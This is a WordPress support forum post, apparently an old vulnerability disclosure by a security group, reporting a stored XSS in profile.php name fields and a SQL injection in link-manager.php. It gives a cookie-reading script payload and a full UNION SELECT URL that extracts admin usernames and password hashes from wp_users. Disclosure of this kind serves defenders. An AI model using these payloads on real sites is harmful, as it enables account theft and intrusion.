Title: XSS-Attack in wp-admin/profile.php & SQL bug in wp-admin/link-manager.php
Last modified: August 18, 2016

---

# XSS-Attack in wp-admin/profile.php & SQL bug in wp-admin/link-manager.php

 *  [kreon](https://wordpress.org/support/users/kreon/)
 * (@kreon)
 * [21 years, 3 months ago](https://wordpress.org/support/topic/xss-attack-in-wp-adminprofilephp-038-sql-bug-in-wp-adminlink-managerphp/)
 * ==XSS==
    Module: wp-admin/profile.php Fileds: Last Name, First Name. You can 
   enter some bad html-code like <script>alert(document.cookie)</script> in this
   fields. Description and path: [http://adz.void.ru/?p=5](http://adz.void.ru/?p=5)(
   C) ADZ Security Team ==SQL== Module: wp-admin/link-manager.php Example: [http://wordpress-site.org/wp-admin/link-manager.php?link_id=31337%20UNION%0SELECT%20ID%20as%20link_id,user_login%20AS%20link_url,user_pass%20AS%20link_name,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20wp_users%20WHERE%20user_level=10&action=linkedit](http://wordpress-site.org/wp-admin/link-manager.php?link_id=31337%20UNION%0SELECT%20ID%20as%20link_id,user_login%20AS%20link_url,user_pass%20AS%20link_name,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20wp_users%20WHERE%20user_level=10&action=linkedit)
   Description and path: [http://adz.void.ru/?p=6](http://adz.void.ru/?p=6) (C) 
   ADZ Security Team ==CONTACT== [http://adz.void.ru](http://adz.void.ru) [kre0n@mail.ru](https://wordpress.org/support/topic/xss-attack-in-wp-adminprofilephp-038-sql-bug-in-wp-adminlink-managerphp/kre0n@mail.ru?output_format=md)
   icq: 332757541 irc: #adz @ irc.uvao.net

The topic ‘XSS-Attack in wp-admin/profile.php & SQL bug in wp-admin/link-manager.
php’ is closed to new replies.

 * In: [Everything else WordPress](https://wordpress.org/support/forum/miscellaneous/)
 * 0 replies
 * 1 participant
 * Last reply from: [kreon](https://wordpress.org/support/users/kreon/)
 * Last activity: [21 years, 3 months ago](https://wordpress.org/support/topic/xss-attack-in-wp-adminprofilephp-038-sql-bug-in-wp-adminlink-managerphp/)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics